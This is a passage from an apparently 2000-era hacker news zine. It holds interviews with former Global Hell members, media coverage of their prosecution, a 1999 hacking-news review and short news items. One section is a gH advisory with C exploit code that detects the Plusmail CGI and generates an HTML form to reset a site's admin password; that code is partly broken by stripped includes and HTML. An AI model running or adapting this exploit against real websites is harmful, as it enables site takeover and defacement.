down to people like Zyklon, with restrictions on computer use after the jail term is up etc? do you think its fair? [12:29] for the most part people fear what they don't understand [12:29] therefore [12:29] computer crime is probably the most unjustly punished crime the fedz (etc) need to be more educated. [12:29] these kids deserve to be behind a sesk [12:29] desk* [12:29] not bars [12:29] yea totally nod [12:29] clinton started a brilliant initiative [12:29] that i hope other politicians carry on which was this? [12:30] as far as educating young minds [12:30] the $91 million internship program with the government [12:30] headed here in colorado springs ah ok any last words you'd like to impart? or greets? [12:31] not really ok [12:31] just keep things pure [12:31] stop the shit talking [12:31] and focus on unity want to plug any sites? [12:32] www.felons.org/son aiight, thanks for your time, and stay free! ;-) [12:32] you too Session Close: Mon Jan 10 12:33:01 2000 @HWA 08.0 Interview: Mosthated gH (Global Hell) Jan 10th 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HWA Exclusive. You may reproduce this if credit is given for the source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate. mosthated is member/founder of the hacker group (gH) Global Hell and was recently featured on a spot on the television editorial show 20/20. ABC Coverage: http://www.abcnews.go.com/onair/2020/2020_991220_hackers_feature.html Squaring Off With ‘Global Hell’ 20/20 Looks at FBI Efforts to Combat Teenage Hackers Patrick Gregory is the one of the founders of Global Hell,an online gang of several dozen of the most active and notorious teenage computer hackers on the Net. Gregory says he has stopped hacking. (ABCNEWS.com) RealVideo javascript:PopoffWindow('/onair/popoff/991220hackers_video_popoff/index.html', 'Horizontal') ABCNEWS.com Dec. 20 — Young cyber whizzes with knowledge to infiltrate the most secure computer systems in the world are growing in numbers and ability. Faced with growing security threats to government and commercial Web sites, the Justice Department is no longer sitting by idly. On 20/20 Monday, Brian Ross takes a look at some members of “Global Hell,” an online gang of several dozen of the most active and notorious teenage computer hackers on the Net, and the FBI’s efforts to delete these hackers from cyberspace. Global Hell members have disrupted such Web locations as the Department of Defense and the telephone company Ameritech, and they have forced the White House Internet access to be closed down for two days. “I don’t understand why they look at us as such bad people,” 19-year-old Patrick Gregory says. Gregory is the one of Global Hell’s founders. Government Wary of Hackers Hackers, now with their own conventions and magazines, see themselves as artists or pranksters at worst. But the federal government says there are plenty of reasons to fear the damage that could be caused by hackers. “If you deface a Web site of a company that is making $18 million dollars a day, you are committing a pretty serious crime,” says Assistant U.S. Attorney Matthew Yarbrough, a member of the federal government’s Cyber Crimes Task Force. “We can’t treat this problem as if it’s just kids. Everyone has to start taking this very seriously.” Eric Burns is the 19-year-old who infiltrated the White House computer system and briefly posted the Global Hell’s logo on the site. Burns’ action forced the Secret Service to cut off White House access to the Internet for two days. Burns, of Shoreline, Wash., pleaded guilty in federal court last month. He was sentenced to 15 months in prison and ordered by a judge not to touch a computer for three years. Hacking Easier Another reason to fear these juvenile cyber surfers is that potentially damaging software is getting easier to handle. With viruses available for downloading from the Web, extensive computer language knowledge is no longer needed. Because of the growing threat of cyberterrorism, the federal government has committed more than a billion dollars to go after computer hackers. “If they penetrate a computer system with intent to defraud, or the intent to sabotage it or, or to steal proprietary information, yes, that’s a federal crime,” assistant special agent in charge of the Dallas FBI office, Bob Garrity, tells 20/20. “It is a serious crime and it’s a growing crime.” But the hackers say they are protecting government property by exposing its vulnerabilities. “This war between hackers and the FBI has been going on for years. … It’s not going to stop any time soon,” says Gregory, who says he has stopped hacking. -=- The IRC interview: Session Start: Mon Jan 10 15:50:41 2000 [15:50] DONE. ok ready to go now then? [15:51] Sure. ok first off you don't have to answer questions if you don't want to. Ok here goes... how old are you now and how long have you been on the internet? [15:53] I am 19 years of age, been online since about 10 or 11 years old. did you take any computer courses at school or would you consider yourself self-taught? [15:53] Self taught. how did you 'get into' computers? [15:54] My family was computer literate, my mother did alot of typing, i got interested that way. you've defaced websites in the past, what was your reason for doing it? or reason(s) [15:55] None, it was stupid, i would never do it again. so it was for fun? or fame? or just for peer recognition? [15:55] supposively helping with security, it did nothing but get ourselves in trouble. [15:55] recognition/fame/help i guess would sum it up. what group(s) have you been a member of in the past? [15:56] gH [15:56] =] :) what is your current view of 'hacking groups' ? [15:57] Pathetic, skillLess, dead in a few weeks. do you think they are mostly "script kiddies" ? [15:59] Yes. [15:59] maybe you should read my advisory ok you were recently profiled on 20/20, what do you think of the reaction from 'scene' people regarding this and what do you think of how it was presented? [16:02] I have no comment. ok you run pure-security.net which is a well put together site for security related material do you hope to make a career in the security field? [16:05] Yes, hopefully with a large organization to track down people like these kids who break into stuff for fun. ok i'll cut this short now then, do you have any final words you'd like to say? [16:06] Everything i wished to express is in the vulnerability. ok thanks for your time and take care [16:07] =] tnx [16:07] i held in my anger. short and sweet why anger? [16:07] i hate script kids. ah [16:07] as you can see in our release. yeh I just read it [16:07] script kid ethics caused us to get fucked. [16:08] if were would have done what we are doing now, 3 years ago. [16:08] we would be millionaires. [16:08] starting security businesses, offering services. I can understand that [16:08] yet, we ./hacked websites. [16:08] dumb dumb dumb. its a trap many people get caught up in the allure of the forbidden [16:09] yeah [16:09] me and gH climbed out. [16:09] now we are to piss down inside and shut it closed. the site is looking pretty good, are you getting a lot of hits? who designed it? [16:11] dishwater [16:11] we are doing a millinium design. [16:11] finally get a more professional look. [16:11] plus i started www.pure-children.net whats that about? [16:12] Educating children and families on? [16:12] "Educate your Future" [16:12] Computer related issues. cool [16:12] internet, help, anti child porn, ect. is that up now? ah just checked, it, coming soon. who's behind that? just yourself or do you have help? [16:13] myself right now. you're going to be busy in the future then :) any other plans? like are you working now or are you continuiing your education? it seems you can't get far these days without those bits of papers (certs etc) [16:16] neither. [16:16] i'm learning by myself. thats commendable if you ever feel like writing any articles or diatribes etc consider sending them to me and i'll put them in the zine. Just something to keep in mind. :) have you read any of our stuff? [16:19] yeah, i seen my name and group used in it before. heh oky i'll let you go now then, once again thanks for your time dude take it easy [16:22] no problem. Session Close: Mon Jan 10 16:22:35 2000 @HWA 09.0 Mosthated/gH advisory Jan 10th 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by Mosthated, gH /* [gH-plus.c] title: [gH plusmail vulnerability] author: ytcracker of gH [phed@felons.org] comments: plusmail is an extremely popular cgi-based administration tool that allows you to take control of your website with a graphical control panel interface. the password file, however, is set with permissions rw enabled, therefore granting the authority to change the password whenever's clever. the following code will detect the vulnerability and generate the required html to exploit. found by: herf@ghettophreaks.org shouts: seven one nine. all of gH. */ /* [gH Security Advisory] Date: 1-10-2000 written by: mosthated of gH (most@pure-security.net) vulnerable: Remote Vulnerability in Plusmail. So far, any envirment running Plusmail. report: Noticed plusmail running on multiple operating systems. The vulnerability lies in the web based tool, which now that is easily exploited, gives you "ADVANCED CONTROL" of a target website. Below is the code by ytcracker of gH, which demonstrates how easy it is to generate the html code which is executed by your web browser to compromise the target host. We have noticed this Plus Mail program is widely used, but have yet to succeed in finding the main site for Plusmail to acknowledge the developers of the remote vulnerability. Most likely this will be ripped out during the online trading, because of script kids not liking this factual addition, but never the less, it will be expressed. This exploit was written to acknowledge security weaknesses, but in no way promotes web page defacments. If you further use this program to gain access to anything not normally accessable by yourself, meaning you script kids, then you are subject to be prosecuted and even get 10 years in prison. Is it honestly worth it to compile this program and randomly ./hack sites and deface them with this half way automatted program to put your nick & group on it? The answer is NO. gh/global hell.. Heard of us?? Seen us on TV?? Read about us?? Most likely.. We've changed and gained knowledge from the experience....Been there done that.. The IT professionals didn't beleive that a group like this could completely go legit, the media figured we would retaliate against the fbi and the world was scared by misleading media articles and television specials about how we are terrorist and destructive teens. I ask the world now, who is helping who? Did the media find this vulnerability? Did the stereotypist who lable us as "cyber gang members" find this vulnerability and allow networks around the world to be patched before us so called "descrutive hackers" gained access to them. Answer yet again, NO, we did, not you who false claim to be helping with security. Your defacements don't help anything, we thought it did before as well, now we realized that it does nothing positive. You stereotypist know nothing about gH, yet can write articles, your wrong. You people think you know so much about hackers. You know nothing, what you think you know, is wrong. What you don't know about us, the information is right under your nose, yet you still can't put your finger on it. Their are 2 sides to the so called "hacking scene", you people should realize their will always be a good and a bad side to most matters. Don't exploit the fact that you don't know anything about the good side, so you initialize a media free for all on the bad side of what you have no idea bout. Just face the real fact, our knowledge could be a great help to all, why not accept us as normal people, not based on some untrue off the wall assumptions. If you use programs like this to deface sites, think before you use this one, because we have been through the childish fights online and expressed our feelings, we were still where we started, from square 1 and would not have gone any farther, until we realized that what we were doing was stupid, pathetic, futureless and illegal. Choose your path wisely, either stop the script kiddie bullshit or get your door kicked in, you decide. fix: Move/Rename the plusmail directory, sorta how you get around RDS. Respect: cDc, l0pht, ADM, w00w00, www.ussrback.com (UssrLabs), all of gH and the people/groups/agents/officers/admins/families/children/presidents parents/senior citizens who gave gH a hard time about the childish things we did. Respect well worth it on a level finally reached to succeed helping with security & pushed to be legit and turn our lives around. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int main(int argc, char *argv[]) { int sock; unsigned long vulnip; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; char *detect; char buffer[1024]; char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n"; char htmI[]="[gH plusmail exploit]

username:
password:
retype password:

pure-security networks

"; FILE *html; printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n"); if(argc<2) { printf(" usage: %s [vulnerable website]\n\n",argv[0]); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } vulnip=inet_addr(argv[1]); vulnip=ntohl(vulnip); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } send(sock, plusvuln,strlen(plusvuln),0); recv(sock, buffer, sizeof(buffer),0); detect = strstr(buffer,"404"); close(sock); if( detect != NULL) { printf(" vulnerabilty not detected.\n"); exit(0); } else printf(" vulnerability detected. generating html...\n"); html=fopen("plus.html","w+b"); fprintf(html,"%s",htmI); fprintf(html,"%s",argv[1]); fprintf(html,"%s",htmII); fclose(html); printf(" spawning lynx...\n"); system("lynx plus.html"); return 0; } @HWA 10.0 HNN's 1999 Year In Review 12/26/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue 1999 has been a whirlwind year for the underground community and HNN. We have searched through the archives and came up with what we thought where the biggest news stories we reported on in 1999. Since HNN tends to cover very different stuff from the mainstream our list is a little different from everyone else's. If you missed a day or to of HNN over the last year you should take a look at our top ten (really it is eleven) news stories of 1999. 1999 Year In Review http://www.hackernews.com/special/1999/99topstories.html HNN: The Year in Review 1999 Page 1 Nineteen Ninety Nine was an exciting year that saw explosive growth for HNN and our ever continuing battle against Fear, Uncertainty, and Doubt (FUD). While some of our engagements with FUD have been successful, like the alleged moving of a British satellite, other battles like the numerous virus scares, were not. 1999 also saw some major events unfold in the underground community, from the exposure of Se7en as a fraud, to the removal and resurrection of Packet Storm Security, and the debacle of MTV. At the close of the year Kevin Mitnick is awaiting release while others take his place behind bars. Throughout 1999 HNN was the place on the net to get up to date breaking news on these stories. These top eleven stories of 1999 are not presented in any particular order. LoU China-Iraq War On December 29, 1998 the underground group Legions of the Underground declared an all out cyber warfare on information infrastructure of China and Iraq. They cited severe civil rights abuses by the governments of both countries as well as the sentencing to death of two bank robbers in China and the production of weapons of mass destruction by Iraq as the reasons for their declaration. By January 5th, 1999 a group known as spl0it and a group based in Poland said that would assist LoU in their cyber warfare efforts. On January 6th, 1999 Legions of the Underground released a statement contradicting their earlier statements that claimed that they never had destructive intentions and blame the media for letting this get out of hand. The retraction by LoU came to late. On the next day January 7th, 1999 an International Hacker Coalition including groups such as cDc, L0pht, CCC, 2600, Phrack, !HISPAHACK and others released a joint statement condemning the Legions of the Underground and their Declaration of War. By January 8, 1999 LoU was reeling from the overwhelming support of the joint condemnation of LoU's actions and released additional retractions of their declaration of war. On January 13, 1999 the Legions of the Underground told Wired magazine that the original press conference was a fake and that the people present during the press conference were spoofed. There is no evidence to support this but there is none to deny it either. Finally Optiklenz, a member of LoU, releases a statement on the view of what happened from the LoU perspective. LoU-China-Iraq War Histogram - Chronological Listing of Events http://www.hackernews.com/special/1999/louwar/louhist.html HNN Archive for December 29, 1998 http://www.hackernews.com/arch.html?122998 Transcript of IRC Press Conference with LoU http://www.hackernews.com/special/1999/louwar/louirc.html LoU Declaration of War http://www.hackernews.com/special/1999/louwar/lou1.html HNN Archive for January 6, 1999 http://www.hackernews.com/arch.html?010699 International Hacker Coalition Joint Statement http://www.hackernews.com/special/1999/louwar/jointstat.html LoU Retraction of War Declaration http://www.hackernews.com/special/1999/louwar/loustat.html Optiklenz Statement http://www.hackernews.com/special/1999/louwar/legspeak.html Hackers Move British Military Satellite This is one battle with FUD that we like to claim that we won. On March 1, 1999 The Sunday Business published a story that was later picked up by the Reuters wire service, that a British military satellite had been taken over by cyber attackers and was being held for ransom. The story itself lacked any sort of verifiable information and HNN called it into question immediately. By the next day spokes people from the British Ministry of Defense flat out denied that such a thing was even possible. HNN editor Space Rogue was a guest on the radio show "Off the Hook" to discuss this incident. Both ZDNet and MSNBC ran stories covering this non event crediting HNN for calling the story suspect. Bob Sullivan of MSNBC went so far as to label HNN "The Voice of Reason". HNN Archive for March 01, 1999 http://www.hackernews.com/arch.html?030199 HNN Archive for March 02, 1999 http://www.hackernews.com/arch.html?030299 Original Sunday Business Article http://www.hackernews.com/special/1999/sundaybusiness.html Security Analysis of Satellite Command and Control Uplinks - Buffer Overflow Article by Brian Oblivion http://www.hackernews.com/bufferoverflow/99/satcom.html MSNBC http://msnbc.com/news/245713.asp ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2217730,00.html Off The Hook - March 02, 1999 episode http://www.2600.com/offthehook/rafiles99/030299.ram Se7en Exposed An article written by Steve Silberman and published by Wired exposed Se7en (Christian Valor) and his single handed cracker crusade against pedophiles as a complete sham. Se7en succeed in creating a massive media hack as articles of his infamous exploits were published in Forbes, MSNBC, LA Times, Newsday and others over several months. Only one of the journalists that we know, Adam Penenberg, that had been duped by Se7en actually admitted his mistake and published a public apology. HNN Archive for February 8, 1999 http://www.hackernews.com/arch.html?020899 Attrition.org - Evidence used against Se7en http://www.hackernews.com/arch.html?020899 Wired http://www.wired.com/news/culture/0,1284,17789,00.html Open letter from Adam Penenberg http://www.hackernews.com/special/1999/penenbergletter.html HNN: The Year in Review Page 2 John Vranesevich Shuts Down Packet Storm Security Probably the biggest story of 1999 was the actions of John Vranesevich, founder and administrator of AntiOnline, who was instrumental in getting the extremely popular web site Packet Storm Security shut down. As far as can be determined John Vranesevich discovered a private directory on Packet Storm that contained potentially libelous material about him and his family. Mr. Vranesevich did not contact the site administrator directly but instead sent an email to the administrators at Harvard University asking that the objectionable material be removed. Harvard responded by unceremoniously pulling the plug on the whole site. Once word of how and why Packet Storm had gone down a public outcry ensued. Mailing lists where started, people started an attempt to mirror the site, Ken Williams received numerous offer to host the site and Mr. Vranesevich became the whipping boy du jour. Because Mr. Williams was unable to access his web site, which was his senior project, he was forced to drop out of school. He later sold the web site to Kroll O' Gara and took a position at a major internet security company. HNN Archive for July 1, 1999 http://www.hackernews.com/arch.html?070199 HNN Archive for July 2, 1999 http://www.hackernews.com/arch.html?070299 Attrition.org - Examples of the supposedly libelous materials posted to Packet Storm http://www.attrition.org/negation/image/vran.jpg Ken Williams Statement http://www.hackernews.com/special/1999/pss/williams.html AntiOnline - John Vranesevich's Defense http://www.antionline.com/archives/editorials/packetstorm.html Letter from Harvard http://www.hackernews.com/special/1999/pss/harvard.html Ken Williams Response to Harvard http://www.hackernews.com/special/1999/pss/kenresponce.html Letter From Bronc Buster - Regarding the actions of Mr. Vranesevich http://www.hackernews.com/special/1999/pss/broncjplet.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2287456,00.html HNN Pulls Massive April Fools Joke It was meant as a simple joke, a simple April Fools Day prank, a reason to smile or to laugh. It turned into one of the biggest stories in the underground for 1999. At midnight EST on April 1, 1999 the main Hacker News web page was updated with what appeared as a web defacement. The page contained all the required elements of a defacement, poor spelling, hax0r speak, shout outs, etc... Many, many, bought the defacement hook line and sinker, HNN administrators even got personal phone calls to their homes at 8am to inform them of the defacement. Remember, even as recently as April web defacements were a relatively rare thing, not occurring by the dozens like they are today. Ahhhh, but the fun did not stop there. At Noon EST the HNN pranksters felt the unsuspecting public needed even more mayhem and hi jinx. The defaced page came down and the days news went up. The news contained stories such as Kevin Mitnick breaking out of jail by whistling a 300 baud carrier into a phone, L0pht Heavy Industries selling L0phtCrack for $1.2 billion to NAI, CERT going out of Business, and Microsoft buying Network Solutions for complete control of the Internet. Considering the volume of mail we received regarding these stories (some of which came from mainstream journalists) many many people believed them. Archive of HNN Defacement http://www.hackernews.com/defaced/1999/HNN/crack.html HNN Archive for April 1, 1999 http://www.hackernews.com/arch.html?040199 (WE didn't fall for this though!, hehe - Ed) PhoneMasters For some reason the mainstream media has really not paid attention to this story. Considering the level to which these crimes escalated and the methods and effort needed to catch the these crooks it is a wonder that there wasn't more media coverage. The FBI called them the 'Phone Masters' and labeled their crimes as one of the greatest cyber-intrusions of all time. Court records show that the Phone Masters had gained access to telephone networks of companies including AT&T Corp., British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun & Bradstreet. They could eavesdrop on phone calls, compromise secure databases, redirect communications, they also had access to portions of the national power grid, and air-traffic-control systems. The FBI had to invent special equipment they called a 'data tap' specifically for this case and get special permission from DOJ to use it. It took several years of listening to phone calls to gather enough evidence for an arrest but on February 22, 1995 the FBI conducted a raid on three suspected members of the PhoneMasters. Other members of the group are thought to remain at large. Three members of the group pleaded guilty to federal charges of one count of theft and possession of unauthorized calling-card numbers and one count of unauthorized access to computer systems. The three where sentenced in October for 24 to 41 months in federal prison. What bothers us most about this story is that almost no mainstream media has reported on the story. The first mention we can find about the Phone Masters is from a local TV stations, WFAA in Dallas FortWorth back in the beginning of May. Phone Master Hacks - Buffer Overflow Article http://www.hackernews.com/bufferoverflow/1999/phonemasters.html HNN Archive October 4, 1999 - PhoneMasters Plead Guilty http://www.hackernews.com/arch.html?100499 Wall Street Journal - one of the few articles about this case http://www.zdnet.com/filters/printerfriendly/0,6061,2345639-2,00.html Union Tribune - Another rare article that has a little bit more info. http://www.uniontrib.com/news/uniontrib/sun/news/news_1n5hacker.html CNN - Tries to answer why the media missed the boat http://www.cnn.com/1999/TECH/computing/12/14/phone.hacking/index.html Aviary Mag - Interview with An Acquaintance of the Phone Masters http://www.aviary-mag.com/Martin/The_Phonemasters_And_I/the_phonemasters_and_i.html MTV Serena Achtul host of MTV News and of a documentary style program known as 'True Life' wanted to do a show on 'hacking' and in particular a show about Kevin Mitnick. She was placed into contact with Emmanuel Goldstein of 2600 Magazine who organized several interviews for her. He spent a lot of time and effort in getting good people for her to talk to and they shot several hours worth of film. For one reason or another the Kevin Mitnick aspect of the show was cut out, so being a good sport Emmanuel directed Serena to the folks at L0pht Heavy Industries. The L0pht crew made time in their busy schedules to spend an entire day with Serana and her film crew explaining the finer points of what they do and explaining the difference between script kiddie defacements and true hacking. Again for some reason, this angle for the show was not to MTVs liking so they struck out on their own looking for whatever it was they wanted. They found Shamrock, the host of the Internet TV show devoted to hacking known as Pseudo. The result was a complete farce. Evidently Shamrock decided to take MTV for a ride and give them what they wanted, a story line straight out of the movie Hackers. The show did nothing to explain what hacking was all about and was far from a documentary. Needless to say many people are upset at MTV and others over this mess. Letters from HNN Viewers http://www.hackernews.com/special/1999/mtv/mtv.html Letter from Emmanuel Goldstein http://www.hackernews.com/special/1999/mtv/emmanuel.html Letter from Shamrock http://www.hackernews.com/special/1999/mtv/shamrock.html HNN: The Year in Review Page 3 Defcon VII and BO2K Defcon probably had the most mainstream media coverage of any hacker convention to date. With over 3000 attendees and over 200 press representatives present it was definitely one of the biggest conventions ever. With the release of Back Orifice 2000 from the Cult of Dead Cow the press was working at a fever pitch trying to cover the story even before the software was released. HNN spent quite a few days inebriated in Las Vegas while we tried to cover the happenings at Defcon. Some of the highlights included the BO2K launch presentation, complete with thumping techno and strobe lights, the ejection of Carolyn Mienel from the conference floor, and the defacement of the Defcon.org web page. When we returned we had over 1200 emails to answer and one pounding hang over. The media went nuts over the BO2K release, sparking debates on just what a virus is and what should be scanned. Network Associates claimed to be the first out of the gate with a patch for the program. Microsoft was even prompted to release a security bulletin. Also at Defcon, Zero Knowledge released 1000 beta copies of Freedom, L0pht Heavy Industries introduced the revolutionary new security tool AntiSniff, Bruce Schneier announced that PPTPv2 'sucks less', and Security Wizards released their Capture the Flag Logs. HNN Archive for July 9, 1999 - Press frenzy prior to con http://www.hackernews.com/arch.html?070999 Defcon.org Defacement Mirror http://www.hackernews.com/defaced/1999/defcon/index.html HNN Archive for July 13, 1999 - the Aftermath http://www.hackernews.com/arch.html?071399 Defcon VII Review - Buffer Overflow Article http://www.hackernews.com/bufferoverflow/99/defconVII.html The Back Orifice 2000 Controversy - Buffer Overflow Article http://www.hackernews.com/bufferoverflow/99/bo2k-1.html How the Anti Virus Industry Works - Buffer Overflow Article http://www.hackernews.com/bufferoverflow/99/avindustry.html AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article http://www.hackernews.com/bufferoverflow/99/avscanning.html Kevin Mitnick Kevin Mitnick's road has been a long and bumpy one that has stretched for several years, 1999 was no different. One small bright thing is that Kevin is scheduled to be released, finally, sometime early in 2000. In March the federal government succeeded in wearing Kevin down. He decided to plead guilty in the hopes to get his four year ordeal over with. Unfortunately he still had charges from the State of California to deal with. HNN Archive for March 29, 1999 http://www.hackernews.com/arch.html?032999#2 On April 26th it was revealed that the companies supposedly hurt by theft of software by Kevin Mitnick never reported those millions of dollars in losses to the SEC as required by law. HNN Archive for April 25, 1999 http://www.hackernews.com/arch.html?042599 Letters from companies estimating the amount of damages. http://www.hackernews.com/special/1999/letters.html June 4th was supposed to be the day in which Kevin was officially sentenced and so demonstrations to support Kevin were planned at federal courthouses across the country. Unfortunately the hearing was postponed at the last minute but the demonstrations continued. Folks in other countries joined in by protesting outside embassies, the New York demonstration hired a skywriter to write FREE KEVIN over Central Park, the Philadelphia demonstration made onto the local news and many online news agencies covered the San Francisco Demonstration, numerous other cities attempted to live web cast their demonstrations. HNN Archive for June 5, 1999 http://www.hackernews.com/arch.html?060599 Press Release -Demonstration Announcement http://www.hackernews.com/press/mitnickpr.html Picture of the Russian Demonstration http://www.hackernews.com/images/kewl4.html On Kevin's fifth birthday behind bars the LA District Attorney graciously decided to drop the state charges against him. The DA claimed that the case had been mischarged. Finally on August 9th, after numerous delays, Kevin received his sentence of 46 months in prison with credit for time served. He will also be forced to pay $4125 restitution to the supposed victims in the case. Instead of halfway house as expected he was remanded to Lompac Federal Prison. HNN Archive for August 9, 1999 http://www.hackernews.com/arch.html?080999 Much more in depth information regarding Kevin Mitnick, his current status and the historical significance of this case can be found here. FREE KEVIN http://www.freekevin.com Virus Scares 1999 was a banner year for viruses. Melissa, CIH, and numerous other viruses had the press working over time. The virus writers keep churning them out, the antivirus companies keep detecting them and the press was not far behind. Melissa seemed to be extremely virulent. By emailing 50 copies of itself after every infection it made it around the globe very quickly. It managed to jump the air-gap onto US governments SIPRNet and even made it on board ships in the Seventh Fleet. Numerous variants of Melissa surfaced with distributed DoS attack capability. Melissa was somehow traced through usenet to AOL and finally to David L. Smith who pleaded guilty to creating and releasing the virus. HNN Archive for March 31, 1999 - Melissa makes it to 7th Fleet, Kills Marines Email, DoS Variant Appears http://www.hackernews.com/arch.html?033199#2 HNN Archive for April 2, 1999 - David Smith arrested and released on $100,000 bail http://www.hackernews.com/arch.html?040299 HNN Archive for April 5, 1999 - Melissa jumps air-gap onto classified SIPRNet http://www.hackernews.com/arch.html?040599 HNN Archive for December 12, 1999 - David Smith pleads guilty. http://www.hackernews.com/arch.html?121299 CIH while not as prolific as Melissa was definitely more destructive. CIH or Chernobyl is triggered to release its payload on April 26th every year and it has been around for a while. It hit exceeding hard this year especially in the Far East. Its creator was traced back to Taiwan where he said he was sorry. HNN Archive for April 27, 1999 - CIH strikes worldwide http://www.hackernews.com/arch.html?042799 HNN Archive for April 29, 1999 - CIH Author Identified. http://www.hackernews.com/arch.html?042999 HNN Archive for May 12, 1999 - China Estimates 360,000 systems Damaged by CIH http://www.hackernews.com/arch.html?051299#3 The Virus Community Speaks http://www.hackernews.com/special/1999/virus.html How the Anti Virus Industry Works - Buffer Overflow Article http://www.hackernews.com/bufferoverflow/99/avindustry.html AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article http://www.hackernews.com/bufferoverflow/99/avscanning.html Ireland, Indonesia, China, Sweden, and Yugoslavia Government sanctioned cyber attacks seem to be all the rage these days. Some countries are openly announcing their plans to create offensive cyber warriors while others are claiming to have already suffered government sanctioned cyber attacks. In January a small ISP in Ireland, Connect Ireland, that hosts the top level domain for East Timor claimed that it had suffered a massive attack by Indonesian government forces. Indonesia of course denied the charges. HNN Archive for January 26, 1999 http://www.hackernews.com/arch.html?012699 Newsweek claimed that President Clinton authorized a "top-secret" plan against Slobodan Milosevic. One part of this plan would use "computer hackers" to attack his foreign bank accounts. Newsweek went on to say that the report instructed the CIA to wage "cyberwar" against Milosevic. HNN Archive for May 24, 1999 HNN Archive for July 6, 1999 http://www.hackernews.com/arch.html?052499 http://www.hackernews.com/arch.html?070699 Yugoslavia Cut Off from the Net? - Buffer Overflow Article http://www.hackernews.com/bufferoverflow/99/yugo.html Sweden announced the formation of a cyber defense force. HNN Archive for July 14, 1999 http://www.hackernews.com/arch.html?071499#3 Nobel Peace Prize laureate Jose Ramos-Horta claimed that hundreds of people around the world were poised to launch a cyber attack against Indonesia should there be any tampering in the election process for East Timor's freedom. No evidence was given for this cyber arsenal build up and no attack ever came. Connect Ireland, the ISP supposedly targeted by Indonesian forces earlier in the year asked that no internet attacks be launched. HNN Archive for August 20, 1999 http://www.hackernews.com/arch.html?082099 Connect Ireland - response to Indonesian threats http://www.hackernews.com/press/conire.html A Chinese military newspaper covering the activities of China's Peoples Liberation Army has called for the recruitment of 'civilian hackers' and for the training of 'cyber warriors' at Army schools. HNN Archive for August 4, 1999 http://www.hackernews.com/arch.html?080499#4 We hope that this disturbing trend does not continue into the next year. It will be an extremely bad day when the internet is legislated as a weapon of war. @HWA 11.0 16th CCC Congress opens Monday in Berlin 12/26/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Frank Although the Y2K issue will keep many people from attending this year the 16th annual Chaos Computer Congress is expecting over 2000 people to show up. New to this years conferances will be Lego Mindstorms Sumo where competitors attempt to push each others creations off a table. Chaos Communication Congress http://www.ccc.de/congress/ HNN Cons Page http://www.hackernews.com/cons/cons.html Wired http://www.wired.com/news/culture/0,1284,33263,00.html Chaos Reigns in Berlin by Steve Kettmann 3:00 a.m. 24.Dec.1999 PST BERLIN -- Any time the inimitable Berlin hackers of the Chaos Computer Club convene, count on cutting-edge insights to emerge from the proceedings. That should be true at the 16th annual CCC congress opening Monday in Berlin, even though the vitality of the three-day event could be short-circuited by the surge of Y2K angst. After all, just the sort of gifted, seasoned hackers and computer visionaries the CCC attracts will in many cases be chained to their desks, stuck on the Y2K watch. Read ongoing Y2K coverage Read ongoing Linux coverage What's next: the Calendar of E-Vents Read more about Culture -- from Wired News "A lot of people are not allowed to go anywhere in these days," CCC spokesman Andy Mueller-Maguhn said. "They all have to stay at their companies until the end of January to see if there are any problems with Y2K. So this is a more chaotic congress than ever." Still, the show promises not to be dull. More than 2,000 people from around the world are expected to talk hacking, do actual hacking, and just generally wallow in the face-to-face contact computer-obsessed people sometimes miss. The annual congresses have featured such lively fare as a spirited debate last year on the controversial death of famous German hacker Boris Floricic, known as Tron (many of his friends still think his apparent suicide in October 1998 was faked by police). Tron's computer and all his files were confiscated, and a discussion this year will be dedicated to him. Last summer, the CCC organized a sprawling hacker camp outside of Berlin. One of the highlights then was Electronic Frontier Foundation board member John Gilmore leading discussions on topics such as encryption code and the ins and outs of Linux -­ all the while taking breaks for space waffles and other diversions. Lock-picking, a sort of mechanical-world spinoff of hacking, was also a huge hit at that camp, and it's expected to pick up next week. Also popular at the summer camp was the Art & Beauty Raum: "For people interested in creating and designing and using computers to build your own world." Other projects will be Create a Part of c-base Contest, Computer Generated Comics, Poetech Slam, and, maybe the most provocatively titled of all, Lego Mindstorms Sumo. "Groups of people will build their stuff in three days and fight with each other and try to throw each other from the table," Mueller-Maguhn said. The CCC has been known internationally for years, and it played a major role this year in helping Andrew Fernandes tell the world about his belief that the National Security Agency might have worked with Microsoft to make it easier for the government agency to bypass security systems in the major Windows operating systems. Fernandes, chief scientist for the security software company Cryptonym in Mississauga, Ontario, chose the CCC to help make his announcement because tapping them is the way to tap the worldwide hacker scene, he said at the time. @HWA 12.0 Canadian Youth Held for Cyber Ransom 12/26/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A 14-year-old Toronto youngster has been charged with electronically breaking into an unidentified e-commerce company. The youth allegedly broke into the company's site and changed passwords to prevent the owner from accessing his mail. He then demanded $5,000 from the owner to return control and was arrested when he came to collect his cash. CNews http://www.canoe.ca/TechNews9912/23_hacker.html Thursday, December 23, 1999 Hacker, 14, in jail over ransom scheme By IAN HARVEY, TORONTO SUN A 14-year-old hacker who held a Toronto e-commerce company for ransom will spend Christmas in jail. He was held over in custody to Jan. 4 at his 